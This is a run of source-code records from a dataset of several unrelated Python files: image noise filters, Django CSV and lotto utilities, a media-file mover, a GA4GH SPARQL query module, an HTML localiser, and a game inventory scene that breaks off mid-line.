from_x, j - from_y] = image[i,j]\r\n\r\n return kernel\r\n\r\n\r\ndef get_median(vector):\r\n vector = np.sort(vector)\r\n median = vector[int(math.floor(len(vector)/2))]\r\n return median\r\n\r\n\r\ndef medianFiltering(filter_size, image):\r\n filtered_image = image\r\n num_rows = image.shape[1]\r\n num_cols = image.shape[0]\r\n\r\n #asumimos que el kernel es simetrico y dimensiones impares\r\n edge = int(math.floor(filter_size[0]/2))\r\n\r\n for i in range(edge, num_rows - edge):\r\n for j in range(edge, num_cols - edge):\r\n kernel = fill_kernel(i,j, filter_size, image)\r\n filtered_image[i,j] = get_median(kernel.flatten())\r\n\r\n\r\n return filtered_image\r\n#-----------------------------------------------------------------\r\n#Funcion: filtro para ruido gaussiano\r\ndef harmonicMeanFilter(noise_img, window):\r\n img = noise_img.copy()\r\n rows, cols = img.shape\r\n\r\n #the pad refers to the number of external pixels(border) not considered when filter the borders\r\n pad = int(window/2)\r\n\r\n\r\n for i in range(pad, rows-pad):\r\n for j in range(pad, cols-pad):\r\n pixels_sum = 0\r\n for k in range(window):\r\n for l in range(window):\r\n\r\n pixels_sum += 1/((img[i-pad+l, j-pad+k])+0.00000001)\r\n\r\n img[i,j] = window*window /(pixels_sum+0.000000001)\r\n\r\n\r\n return img\r\n#--------------------------------------------------------------\r\nimage = cv2.imread('lena.jpg',0) #imagen leida\r\nsp_img = sp_noise(image,0.10) #imagen con ruido sal y pimienta\r\ngauss_img = gauss_noise(image) #imagen con ruido gaussiano\r\n#cv2.imshow('salt',sp_img)\r\n#----------------------------------------------------------\r\n#Aplicamos filtro para sal y pimienta\r\nkernel_size = (3, 3) #kernel para filtro\r\nsaltpepper = sp_img.copy()\r\nmedian_filtered_image = medianFiltering(kernel_size, saltpepper) #imagen aplicando median filter\r\n#cv2.imshow('median filter',median_filtered_image)\r\n#------------------------------------------------------------\r\n#Aplicamos filtro para imagen ruido gausiano\r\nharmonic_filtered_image = harmonicMeanFilter(gauss_img,3)\r\n#cv2.imshow('harmonic',harmonic_filtered_image)\r\n#-------------------------------------------------------------\r\n#Mostramos las imagenes\r\nrow1 = np.hstack((sp_img,gauss_img))\r\nrow2 = np.hstack((median_filtered_image,harmonic_filtered_image))\r\nresult = np.vstack((row1,row2))\r\ncv2.imshow('Salt and pepper -> Median Filter|| Gaussian -> Harmonic Filter',result)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"Lab5/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"330521422","text":"import numpy\n\nall_distances = []\nall_centroids = []\nwith open('./data/restaurants.txt') as f:\n for line in f:\n distance = float(line.split('||')[4].strip())\n if distance < 50:\n all_centroids.append([entry.strip() for entry in line.split('||')])\n all_distances.append(distance)\n\n\nprint(all_distances)\nmax_distance = numpy.max(all_distances)\n\nprint(\"max_distance = \", max_distance)\n\nwith open('./data/restaurants.new.txt', 'w') as f:\n for centroid in all_centroids:\n centroid[1] = float(centroid[1]) / 5\n centroid[2] = float(centroid[2]) / 4\n centroid[4] = float(centroid[4]) / max_distance\n f.write('||'.join((centroid[0], str(centroid[1]), str(centroid[2]), str(centroid[3]), str(centroid[4]), '\\n')))\n\n","sub_path":"scripts/fix_algorithm_again_again.py","file_name":"fix_algorithm_again_again.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"641890250","text":"\"\"\"유틸 함수.\"\"\"\nimport base64\nimport csv\nimport json\nimport typing\n\nimport lz4.frame\nimport requests\nfrom django import forms\nfrom django.contrib import admin\nfrom django.core import exceptions, serializers\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, render\nfrom django.urls import path\n\nfrom .models import Lotto\n\n\nclass CsvImportForm(forms.Form):\n \"\"\"CSV Import 시 사용할 Form.\"\"\"\n\n csv_file = forms.FileField()\n\n\nclass ExportCsvMixin(admin.ModelAdmin):\n \"\"\"CSV Export 기능 제공용 Mixin.\"\"\"\n\n csv_file = forms.FileField()\n field_names = None\n\n def export_as_csv(self, request, queryset):\n \"\"\"CSV으로 Export.\"\"\"\n meta = self.model._meta\n if self.field_names:\n field_names = self.field_names\n else:\n field_names = [field.name for field in meta.fields]\n\n response = HttpResponse(content_type=\"text/csv\")\n response[\"Content-Disposition\"] = \"attachment; filename={}.csv\".format(meta)\n writer = csv.writer(response)\n\n writer.writerow(field_names)\n for obj in queryset:\n writer.writerow([getattr(obj, field) for field in field_names])\n\n return response\n\n export_as_csv.short_description = \"Export Selected\"\n\n def get_urls(self):\n \"\"\"Get urls.\"\"\"\n urls = super().get_urls()\n my_urls = [\n path(\"import-csv/\", self.import_csv),\n ]\n return my_urls + urls\n\n def import_csv(self, request):\n \"\"\"Import CSV File.\"\"\"\n if request.method == \"POST\":\n csv_file = request.FILES[\"csv_file\"]\n reader = csv.DictReader(\n csv_file.read().decode(\"utf-8\").splitlines(), delimiter=\",\"\n )\n for r in reader:\n if \"id\" in r:\n r[\"id\"] = int(r[\"id\"])\n obj = self.model(**r)\n obj.save()\n\n self.message_user(request, \"Your csv file has been imported\")\n return redirect(\"..\")\n form = CsvImportForm()\n payload = {\"form\": form}\n return render(request, \"admin/csv_form.html\", payload)\n\n\ndef new_lotto(draw_number):\n \"\"\"로또 정보.\"\"\"\n is_new = False\n try:\n obj = Lotto.objects.get(draw_number=draw_number)\n result = obj.numbers\n except exceptions.ObjectDoesNotExist:\n try:\n params = {\n \"method\": \"getLottoNumber\",\n \"drwNo\": draw_number,\n }\n # https://www.nlotto.co.kr/common.do?method=getLottoNumber&drwNo=912\n result = requests.get(\"https://www.nlotto.co.kr/common.do\", params=params)\n result = json.loads(result.text)\n if not result[\"returnValue\"] == \"fail\":\n obj = Lotto(draw_number=draw_number, numbers=result)\n obj.save()\n is_new = True\n except Exception as e:\n result = str(e)\n\n return result, is_new\n\n\ndef get_page_info(object_list, page, count):\n \"\"\"페이지 정보.\"\"\"\n paginator = Paginator(object_list, count)\n p = paginator.page(page)\n\n start_10 = (page - 1) // 10 * 10 + 1\n end_10 = min(start_10 + 9, paginator.num_pages)\n\n page_list = [i for i in range(start_10, end_10 + 1)]\n\n page_info = {\n \"page\": page,\n \"prev\": page - 1 if p.has_previous() else 0,\n \"next\": page + 1 if p.has_next() else 0,\n \"page_list\": page_list,\n }\n\n return p, page_info\n\n\ndef get_compressed_result(image_list, count, page):\n \"\"\"데이터 압축해서 제공.\"\"\"\n paginator = Paginator(image_list, count)\n p = paginator.page(page)\n\n image_list = serializers.serialize(\"json\", p)\n\n result = {\"has_next\": p.has_next(), \"image_list\": json.loads(image_list)}\n\n compressed = lz4.frame.compress(json.dumps(result).encode(\"utf-8\"))\n return HttpResponse(base64.b85encode(compressed))\n\n\ndef to_table(contents: typing.List, row_count: int) -> typing.List[typing.List]:\n \"\"\"\n 테이블 형태로 grouping.\n\n :param contents: list 형태의 데이터.\n :param row_count: 한줄에 포함될 element 개수\n :return: grouping 된 테이블\n \"\"\"\n row = []\n table = []\n for count, img in enumerate(contents):\n row.append(img)\n count += 1\n\n if count % row_count == 0:\n table.append(row)\n row = []\n if row:\n table.append(row)\n\n return table\n","sub_path":"dashboard/book/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"229579830","text":"# Created by Choon Hian \n# 8 March 2017\n# This script takes in a DIVA TAPE XML file, scans for Clips (Items/Objects) inside the DIVA TAPE XML file.\n# Then, go into the \"temp_store\" folder, and move all the Dalet Clip XML files which are found inside this particular DIVA TAPE XML FILE, one level up.\n\n\nfrom lxml import etree\nfrom lxml import _elementpath\nimport gzip\nimport os\nimport argparse\n\n# DIVA_TAPE_XML_FILENAME = 'tapeset-A00320.xml'\n\n# Remember to put a / at the end if there is a folder\n# Step up 2 times from the .exe file's location\nDIRECTORY_DALET_XML = '../../temp_store/' \nFILE_HAS_BEEN_MOVED_DALET_XML_DIR = '../../' \n\n\nprint(\"Make sure the DIVA TAPE XML of the tape you are migrating \\nis in the \\\"DumpDivaTapeXMLHere\\\" folder!\")\nprint('')\nprint('')\nprint('Enter filename of DIVA TAPE XML,')\nDIVA_TAPE_XML_FILENAME = raw_input(\"eg: \\\"tapeset-A00320.xml\\\": \")\nprint('')\nprint('')\n\n\n\n# Open the DIVA xml file\ntapeXML = etree.parse('../../DumpDivaTapeXMLHere/'+DIVA_TAPE_XML_FILENAME)\n\n# Make a list of all the attributes of objectName\nobjectNameList = tapeXML.xpath('//@objectName')\n\n# Loop through the list\nfor n,i in enumerate(objectNameList):\n\t# define a seperator as '.'\n\tseperator = '.'\n\n\t# get objectName before seperator\n\tobjectNameBeforeSeperator = objectNameList[n].split(seperator,1)[0]\n\t# print objectNameBeforeSeperator\n\n\t# replace all objectNames with objectNames that do not have the suffix\n\tobjectNameList[n] = objectNameBeforeSeperator\n\n\n\n# Print the list of clips\n# print 'CLIPS IN THIS DIVA TAPE'\n# print objectNameList\n\n\n# Print the total number of clips in the tape\nprint ('Total number of clips found in DIVA TAPE XML = ',len(objectNameList))\nprint('')\nprint('')\n\n\n\n# Cycle through the folder of dalet XMLs \ndirectory = DIRECTORY_DALET_XML\ndaletClipsList = []\ncountMovedClips = 0\nfor filename in os.listdir(directory):\n\t# remove the part of filename after '-'\n\tseperator2 = '_'\n\tfilenameBeforeSeperator = filename.split(seperator2,1)[0]\n\t# print filenameBeforeSeperator\n\tdaletClipsList.append(filenameBeforeSeperator)\n\n\t# Check whether this filename appears in the array of diva tape objects\n\tif any(filenameBeforeSeperator in s for s in objectNameList):\n\t\t# print filenameBeforeSeperator\n\t\t# print 'yes'\n\t\tcountMovedClips = countMovedClips + 1\n\n\t\t# MOVE THE FILE!\n\t\tos.rename(DIRECTORY_DALET_XML + '' + filename, FILE_HAS_BEEN_MOVED_DALET_XML_DIR + '' + filename)\n\n\nprint ('Number of DALET XMLs moved = ',countMovedClips)\nprint('')\nprint('')\nraw_input(\"Press ENTER to close this window.\")\n","sub_path":"FINAL_SCRIPT.py","file_name":"FINAL_SCRIPT.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"459591867","text":"\n\nfrom xai.brain.wordbase.nouns._debility import _DEBILITY\n\n#calss header\nclass _DEBILITIES(_DEBILITY, ):\n\tdef __init__(self,): \n\t\t_DEBILITY.__init__(self)\n\t\tself.name = \"DEBILITIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"debility\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_debilities.py","file_name":"_debilities.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"222777803","text":"\"\"\"\nModule responsible for translating g2p data into GA4GH native\nobjects.\n\"\"\"\n\nimport rdflib\nimport urlparse\nimport time\nimport sets\n\nimport ga4gh.protocol as protocol\nimport ga4gh.exceptions as exceptions\n\n\nclass G2PDataset:\n \"\"\"\n An rdf object store. The cancer genome database\n [Clinical Genomics Knowledge Base]\n (http://nif-crawler.neuinfo.org/monarch/ttl/cgd.ttl)\n published by the Monarch project was the source of Evidence.\n \"\"\"\n\n def __init__(self, sources):\n \"\"\"\n Initialize dataset, using the passed dict of sources\n [{source,format}] see rdflib.parse() for more\n \"\"\"\n\n self._searchQuery = \"\"\"\n PREFIX OBAN: \n PREFIX OBO: \n PREFIX rdfs: \n PREFIX faldo: \n PREFIX rdf: \n SELECT %PROPERTIES%\n WHERE {\n ?s a OBAN:association .\n ?s OBAN:association_has_subject ?l .\n ?l rdfs:label ?location_label .\n %LOCATION%\n ?s OBO:RO_has_environment ?drug .\n ?drug rdfs:label ?drug_label .\n ?s OBAN:association_has_object ?d .\n ?d rdfs:label ?disease_label .\n ?d rdf:type ?disease .\n ?s OBAN:association_has_object_property ?evidence .\n OPTIONAL { ?evidence rdfs:label ?evidence_label } .\n %FILTER%\n }\n \"\"\"\n\n # initialize graph\n self._rdfGraph = rdflib.ConjunctiveGraph()\n\n # load with data\n for source in sources:\n if not source['format']:\n self._rdfGraph.parse(source['source'])\n else:\n self._rdfGraph.parse(source['source'],\n format=source['format'])\n\n # TODO is this necessary?\n self.associationsLength = 0\n # log queries that take more than N seconds\n self.RESPONSETIME_LOGGING_THRESHOLD = 2\n\n def _search(self, request):\n offset = request.offset\n\n now = time.time()\n associations = self.queryLabels(\n request.feature, request.evidence, request.phenotype,\n request.pageSize, offset)\n responseTime = time.time()-now\n if responseTime > self.RESPONSETIME_LOGGING_THRESHOLD:\n print('_search', responseTime)\n print(request)\n\n self.associationsLength = len(associations)\n for association in associations:\n yield association\n\n def queryLabels(\n self, location=None, drug=None, disease=None, pageSize=None,\n offset=0):\n\n \"\"\"\n This query is the main search mechanism.\n It queries the graph for annotations that match the\n AND of [location,drug,disease].\n \"\"\"\n query = self.formatQuery(location, drug, disease)\n\n query = query.replace(\"%PROPERTIES%\",\n \"distinct ?s ?location ?location_label \" +\n \"?disease ?disease_label ?drug ?drug_label\")\n\n query += (\"LIMIT {} OFFSET {} \".format(pageSize, offset))\n\n now = time.time()\n results = self._rdfGraph.query(query)\n\n # Depending on the cardinality this query can return multiple rows\n # per annotations. Here we reduce it to a list of unique annotations\n # URIs\n uniqueAnnotations = sets.Set()\n for row in results:\n uniqueAnnotations.add(\"<{}>\".format(row['s'].toPython()))\n\n # now fetch the details on the annotation\n annotations = []\n for annotation in uniqueAnnotations:\n annotations.append(\n self.toGA4GH(\n self.query(annotation)))\n responseTime = time.time()-now\n if responseTime > self.RESPONSETIME_LOGGING_THRESHOLD:\n print('queryLabels', responseTime)\n print('len(annotations)', len(annotations))\n print(query)\n\n return annotations\n\n def formatQuery(self, location=None, drug=None, disease=None):\n \"\"\"\n Generate a formatted sparql query with appropriate filters\n \"\"\"\n query = self._searchQuery\n if location is None and drug is None and disease is None:\n raise exceptions.NotImplementedException(\n \"At least one of [location, drug, disease] must be specified\")\n filters = []\n\n if location and isinstance(location, basestring):\n filters.append('regex(?location_label, \"{}\")'.format(location))\n if drug and isinstance(drug, basestring):\n filters.append('regex(?drug_label, \"{}\")'.format(drug))\n if disease and isinstance(disease, basestring):\n filters.append('regex(?disease_label, \"{}\")'.format(disease))\n\n locationClause = \"\"\n if isinstance(location, dict):\n locations = []\n for id in location['ids']:\n locations.append('?location = <{}> '.format\n (id['database'] + id['identifier']))\n locationClause = \"({})\".format(\" || \".join(locations))\n filters.append(locationClause)\n locationClause = \"?l faldo:location ?location .\\n\"\n\n if isinstance(drug, dict):\n drugs = []\n for id in drug['ids']:\n drugs.append('?drug = <{}> '.format\n (id['database'] + id['identifier']))\n drugsClause = \"({})\".format(\" || \".join(drugs))\n\n filters.append(drugsClause)\n\n if isinstance(disease, dict):\n diseases = []\n for id in disease['ids']:\n diseases.append('?disease = <{}> '.format\n (id['database'] + id['identifier']))\n diseasesClause = \"({})\".format(\" || \".join(diseases))\n filters.append(diseasesClause)\n\n filter = \"FILTER ({})\".format(' && '.join(filters))\n query = query.replace(\"%FILTER%\", filter)\n query = query.replace(\"%LOCATION%\", locationClause)\n return query\n\n def query(self, subject=''):\n \"\"\"\n This is the 'detail' query\n\n Return a list of dictionaries.\n Each dict is an [annotation](http://www.w3.org/ns/oa#Annotation)\n All keys in the dict are predicates of the annotation.\n All cells in the dict are predicate->object converted to strings.\n\n If an annotation has a \n predicate that class is appended to the annotation dict in the\n 'location' property\n \"\"\"\n\n annotationQuery = \"\"\"\n PREFIX OBAN: \n PREFIX rdfs: \n SELECT distinct *\n WHERE {\n %SUBJECT% ?p ?o .\n OPTIONAL {?o rdfs:label ?label .}\n }\n \"\"\"\n\n annotationQuery = annotationQuery.replace(\"%SUBJECT%\", subject)\n now = time.time()\n results = self._rdfGraph.query(annotationQuery)\n rows = [row.asdict() for row in results]\n responseTime = time.time()-now\n if responseTime > self.RESPONSETIME_LOGGING_THRESHOLD:\n print('annotationQuery', responseTime)\n print(annotationQuery)\n\n for row in rows:\n for k in row:\n row[k] = row[k].toPython()\n row['s'] = subject\n\n locationQueryTemplate = \"\"\"\n PREFIX rdfs: \n PREFIX OBO: \n SELECT distinct *\n WHERE {\n %SUBJECT% a OBO:SO_0001059 .\n %SUBJECT% ?p ?o .\n OPTIONAL {?o rdfs:label ?label .} .\n }\n \"\"\"\n\n locationRows = []\n uniqueLocations = sets.Set()\n for row in rows:\n if row['p'] == 'http://purl.org/oban/association_has_subject':\n uniqueLocations.add(\"<\" + row['o'] + \">\")\n\n for location in uniqueLocations:\n locationQuery = locationQueryTemplate.replace(\n \"%SUBJECT%\", location)\n results = self._rdfGraph.query(locationQuery)\n locationRows = [locationRow.asdict() for locationRow in results]\n for locationRow in locationRows:\n for k in locationRow:\n locationRow[k] = locationRow[k].toPython()\n locationRow['s'] = location\n if responseTime > self.RESPONSETIME_LOGGING_THRESHOLD:\n print('locationQuery', responseTime)\n print(locationQuery)\n\n annotation = self.flatten(rows)\n location = self.flatten(locationRows)\n annotation['location'] = location\n return annotation\n\n def flatten(self, dict):\n \"\"\"\n Given a dict of dicts,\n flatten it to a single dict using predicate as keys\n For multiple occurrences of a predicate, create an array\n Each value in the dict is an object {val:'x', label:'y'}\n The value of 's' (subject) is copied to the 'id' property\n \"\"\"\n a = {}\n for row in dict:\n obj = {'val': row['o']}\n if 'label' in row:\n obj['label'] = row['label']\n\n if row['p'] in a and \\\n a[row['p']].__class__.__name__ != \"list\":\n asIs = a[row['p']]\n a[row['p']] = []\n a[row['p']].append(asIs)\n\n if row['p'] in a:\n a[row['p']].append(obj)\n else:\n a[row['p']] = obj\n\n a['id'] = row['s']\n return a\n\n def toGA4GH(self, annotation):\n \"\"\"\n given an annotation dict, return a protocol.FeaturePhenotypeAssociation\n \"\"\"\n\n fpa = None\n\n # annotation keys\n source = 'http://purl.org/dc/elements/1.1/source'\n location = 'location'\n evidenceURI = 'http://purl.obolibrary.org/obo/RO_0002558'\n hasObject = 'http://purl.org/oban/association_has_object'\n # location keys\n GENO_0000408 = 'http://purl.obolibrary.org/obo/GENO_0000408'\n\n location = annotation['location']\n if GENO_0000408 in location:\n id_, ontologySource = self.namespaceSplit(\n location[GENO_0000408]['val'])\n name = location[GENO_0000408]['label']\n else:\n id_, ontologySource = self.namespaceSplit(location['id'])\n name = location['id']\n\n f = protocol.Feature()\n f.featureType = protocol.OntologyTerm.fromJsonDict({\n \"name\": name,\n \"id\": id_,\n \"ontologySource\": ontologySource})\n f.id = annotation['id']\n f.featureSetId = ''\n f.parentIds = []\n f.attributes = protocol.Attributes.fromJsonDict({\"vals\": {}})\n\n # # debugger example how to validate and capture validation errors\n # if not protocol.Feature.validate(f.toJsonDict()):\n # e = exceptions.RequestValidationFailureException(\n # f.toJsonDict(),protocol.Feature)\n # print(e.message)\n # from IPython.core.debugger import Pdb ; Pdb().set_trace()\n\n id_, ontologySource = self.namespaceSplit(\n annotation[hasObject]['val'])\n\n fpa = protocol.FeaturePhenotypeAssociation()\n fpa.id = annotation['id']\n fpa.features = [f]\n fpa.description = None\n fpa.evidence = []\n fpa.environmentalContexts = []\n\n phenotypeInstance = protocol.PhenotypeInstance()\n phenotypeInstance.type = protocol.OntologyTerm.fromJsonDict({\n \"name\": annotation[hasObject]['label'],\n \"id\": id_,\n \"ontologySource\": ontologySource})\n fpa.phenotype = phenotypeInstance\n\n # ECO or OBI is recommended\n if source in annotation:\n if not isinstance(annotation[source], list):\n annotation[source] = [annotation[source]]\n for src in annotation[source]:\n evidence = protocol.Evidence()\n evidence.evidenceType = protocol.OntologyTerm()\n id_, ontologySource = self.namespaceSplit(src['val'])\n evidence.evidenceType.ontologySource = ontologySource\n evidence.evidenceType.id = id_\n\n evidence.evidenceType.name = ''\n if 'label' in annotation[evidenceURI]:\n evidence.evidenceType.name = \\\n annotation[evidenceURI]['label']\n fpa.evidence.append(evidence)\n if not protocol.Evidence.validate(evidence.toJsonDict()):\n raise exceptions.RequestValidationFailureException(\n evidence.toJsonDict(), protocol.Evidence)\n\n return fpa\n\n def namespaceSplit(self, url, separator='/'):\n \"\"\"\n given a url return the id of the resource and the ontology source\n \"\"\"\n o = urlparse.urlparse(url)\n _id = o.path.split(separator)[-1]\n ontologySource = urlparse.urlunsplit([o[0],\n o[1],\n o[2].replace(_id, ''),\n o[4], ''])\n return _id, ontologySource\n","sub_path":"ga4gh/datamodel/genotype_phenotype.py","file_name":"genotype_phenotype.py","file_ext":"py","file_size_in_byte":13570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"475723576","text":"#!/usr/bin/python3\n\n# Usage: ./localise-html.py -c config.conf index.html < assets/strings/bar.json > build/index.bar.html\n\nread_conf = __import__('read-conf')\nimport argparse\nfrom html.parser import HTMLParser\nfrom sys import stdin, stderr, argv\nfrom os import listdir, path\nimport json, re\n\nrtl_languages = ['heb', 'ara', 'pes', 'urd', 'uig']\n\nclass DataTextHTMLParser(HTMLParser):\n data_text = None\n output = []\n\n def p(self, value):\n self.output.append(value)\n\n def run_replacements(self, text):\n for k in self.replacements:\n text = text.replace('{{%s}}'%(k,), self.replacements[k])\n return text\n\n def handle_startendtag(self, tag, attrs):\n # We don't handle data-text on tags like and , but\n # that doesn't quite make sense either\n if tag == \"link\" and ('id', 'rtlStylesheet') in attrs:\n text = self.get_starttag_text()\n self.p(text[:text.index('/>')] + ('enabled' if self.localename in rtl_languages else 'disabled' ) + ' />')\n print(text, text[:text.index('/>')])\n else:\n self.p(self.get_starttag_text())\n\n def handle_starttag(self, tag, attrs):\n \"\"\"This is where localisation happens\"\"\"\n attr_localization = list(filter(lambda x: x[0] == \"data-textattr\", attrs))\n if not attr_localization:\n for attr in attrs:\n if attr[0] == \"data-text\" and attr[1] in self.locale:\n text = self.locale[attr[1]]\n if text.startswith(\"%%UNAVAILABLE\"):\n text = self.fallback_locale[attr[1]]\n self.data_text = self.run_replacements(text)\n\n \"\"\"This is where html's dir attribute is set to ltr or rtl\"\"\"\n if tag == \"html\":\n text = self.get_starttag_text()\n self.p('config.LANGNAMES['%s']=%s\\n \" % (\n self.localename,\n self.locale[\"@langNames\"]))\n self.p(\"\" % (tag,))\n def handle_data(self, data):\n if self.data_text:\n self.p(self.data_text)\n self.data_text = None\n else:\n self.p(data)\n def handle_comment(self, data):\n self.p(\"\" %(data,))\n def handle_entityref(self, name):\n self.p(\"&%s;\"%(name,))\n def handle_charref(self, name):\n self.p(\"&#%s;\" % (name,))\n def handle_decl(self, data):\n self.p(\"\" % (data,))\n def handle_pi(self, data):\n self.p(\"\" % (data,))\n\ndef run(html_path, json_path, out_path, conf_path, fallback_path):\n try:\n # convert_charrefs will default to True in py3.5:\n parser = DataTextHTMLParser(convert_charrefs=False)\n except TypeError:\n # convert_charrefs was added in py3.4:\n parser = DataTextHTMLParser()\n parser.locale = json.loads(\"\".join(open(json_path).readlines()))\n parser.localename = path.basename(json_path).replace('.json', '')\n parser.fallback_locale = json.loads(\"\".join(open(fallback_path).readlines()))\n parser.replacements = read_conf.load_conf(conf_path)['REPLACEMENTS']\n parser.feed(\"\".join(open(html_path).readlines()))\n with open(out_path, 'w') as out:\n out.write(\"\".join(parser.output))\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser(description='Localise an HTML file using a json file from stdin')\n argparser.add_argument('template', help='HTML file to localise')\n argparser.add_argument('localisations', help='JSON file to use to localise')\n argparser.add_argument('output', help='Output file')\n argparser.add_argument('-c', '--config', default='config.conf', help='Config file name (default: config.conf)')\n argparser.add_argument('-f', '--fallback', default='build/strings/eng.json', help='Fallback JSON file to use when main one gives no answer')\n\n args = argparser.parse_args()\n\n run(args.template, args.localisations, args.output, args.config, args.fallback)\n","sub_path":"localise-html.py","file_name":"localise-html.py","file_ext":"py","file_size_in_byte":5000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"331950178","text":"import logging\nfrom typing import Any, Callable, Iterable, List, NamedTuple, Optional, Tuple\n\nfrom data.constants import SCREEN_SIZE, BackgroundImages\nfrom events.events_base import (BasicEvents, EventListener, EventType,\n InventorySelectionEvent,\n InventoryTransferEvent)\nfrom models.characters.chassis import Chassis\nfrom models.characters.mods_base import Mod, SlotTypes\nfrom models.characters.player import get_player\nfrom models.scenes.layouts import Layout\nfrom models.scenes.scenes_base import BasicResolution, Resolution, Scene\n\n\nclass SlotHeaderInfo(NamedTuple):\n \"\"\"Data represented in the header row of an inventory slot.\"\"\"\n slot: SlotTypes\n capacity: int\n mods: Tuple[Mod, ...]\n\n @property\n def num_filled(self) -> int:\n return len(self.mods)\n\n\nclass SlotRowInfo(NamedTuple):\n \"\"\"Data represented by single row of an inventory slot.\"\"\"\n mod: Mod\n is_selected: bool\n\n\nclass SelectedModInfo(NamedTuple):\n \"\"\"Data representing information about the selected Mod.\"\"\"\n mod: Mod\n\n\nclass InventoryScene(Scene, EventListener):\n\n def __init__(self, prev_scene_loader: Callable[[], Scene],\n loot_mods: Callable[[], Iterable[Mod]] = None) -> None:\n \"\"\"\n\n Args:\n prev_scene_loader: Zero-argument function that returns the previous\n scene.\n loot_mods: Zero-argument function that returns the mods on the\n ground.\n \"\"\"\n super().__init__()\n self._background_image = BackgroundImages.INVENTORY.path\n self._player = get_player()\n self._selected_mod: Optional[Mod] = None\n if loot_mods is not None:\n self._mods_on_ground = list(loot_mods())\n else:\n self._mods_on_ground = []\n self._update_layout()\n self._resolution = BasicResolution(prev_scene_loader)\n self._is_resolved = False\n self._UI_error_message: str = ''\n\n def notify(self, event: EventType) -> None:\n if isinstance(event, InventorySelectionEvent):\n if self._selected_mod is event.mod:\n self._selected_mod = None\n else:\n self._selected_mod = event.mod\n self._update_layout()\n if isinstance(event, InventoryTransferEvent):\n # Check that transfer is valid\n if self._selected_mod is None:\n return\n new_slot = event.new_slot\n valid_slots = self._selected_mod.valid_slots() + [SlotTypes.GROUND]\n if new_slot not in valid_slots:\n self._UI_error_message = 'Invalid slot'\n return\n chassis = self._player.chassis\n if self._selected_mod in chassis.mods_in_slot(new_slot):\n return # Mod already in the specified slot.\n if chassis.slot_full(new_slot) and new_slot != SlotTypes.GROUND:\n self._UI_error_message = 'Slot full'\n return\n\n # Carry out valid transfer, accounting for GROUND slot which is not\n # actually a chassis slot.\n if new_slot == SlotTypes.GROUND:\n chassis.remove_mod(self._selected_mod)\n self._mods_on_ground.append(self._selected_mod)\n logging.debug('Moving {} to ground.'.format(self._selected_mod))\n else:\n if self._selected_mod in self._mods_on_ground:\n self._mods_on_ground.remove(self._selected_mod)\n chassis.transfer_mod(self._selected_mod, new_slot)\n if event == BasicEvents.INVENTORY:\n self._is_resolved = True\n\n @property\n def layout(self) -> Layout:\n return self._layout\n\n @property\n def selected_mod(self) -> Optional[Mod]:\n return self._selected_mod\n\n @property\n def UI_error_message(self) -> str:\n return self._UI_error_message\n\n @property\n def background_image(self) -> str:\n return self._background_image\n\n def is_resolved(self) -> bool:\n return self._is_resolved\n\n def get_resolution(self) -> Resolution:\n assert self.is_resolved()\n res = self._resolution\n del self._resolution\n return res\n\n def _update_layout(self) -> None:\n\n # The layout associates scene data with different rects on the screen.\n # These rects are used to process mouse clicks and to determine how to\n # draw the scene. For example, a given mod stored in one of the slot\n # categories is associated with the rect where it will show up on the\n # screen.\n chassis = self._player.chassis\n\n # Left half of screen, composed of chassis slots\n\n capacities = chassis.slot_capacities\n\n fillable_slots = [slot for slot in SlotTypes\n if capacities.get(slot, 0) > 0\n and slot != SlotTypes.STORAGE]\n\n rows_per_column = 15\n\n # Left half of left column\n num_rows = 0\n slot_elems_0 = []\n for slot in fillable_slots[:3]:\n data = _slot_header(slot, chassis)\n num_rows += _DEFAULT_ROWS_PER_SLOT + 1\n slot_elems_0.extend(\n [(self._slot_layout(data), _DEFAULT_ROWS_PER_SLOT), (None, 1)])\n assert slot_elems_0\n # Don't need final gap\n slot_elems_0.pop()\n num_rows -= 1\n\n # Padding on bottom of column for consistent row number\n if num_rows < rows_per_column:\n slot_elems_0.append((None, rows_per_column - num_rows))\n\n chassis_col_0 = Layout(slot_elems_0)\n\n # Right half of left column has extra space for the storage slot\n num_rows = 0\n slot_elems_1 = []\n for slot in fillable_slots[3:]:\n data = _slot_header(slot, chassis)\n num_rows += _DEFAULT_ROWS_PER_SLOT + 1\n slot_elems_1.extend(\n [(self._slot_layout(data), _DEFAULT_ROWS_PER_SLOT), (None, 1)])\n storage_data = _slot_header(SlotTypes.STORAGE, chassis)\n storage_rows = storage_data.num_filled + 1\n slot_elems_1.append((self._slot_layout(storage_data, storage_rows),\n storage_rows))\n num_rows += storage_rows\n\n if num_rows < rows_per_column:\n slot_elems_1.append((None, rows_per_column - num_rows))\n chassis_col_1 = Layout(slot_elems_1)\n\n left_half = Layout([(None, 1), (chassis_col_0, 10), (None, 1),\n (chassis_col_1, 10), (None, 1)], 'horizontal')\n\n # Right half of screen, containing mod information (if present) and\n # loot slots (if present)\n\n # selected mod information\n\n if self._selected_mod is not None:\n info = SelectedModInfo(self._selected_mod)\n mod_info_layout = Layout([(None, 1), (info, 3), (None, 1)],\n 'horizontal')\n mod_info_layout = Layout([(None, 1), (mod_info_layout, 5),\n (None, 1)])\n else:\n mod_info_layout = Layout() # nothing to display\n\n # Ground inventory\n header = SlotHeaderInfo(SlotTypes.GROUND, 0,\n tuple(self._mods_on_ground))\n\n loot_layout = self._slot_layout(header, num_rows=6)\n loot_layout 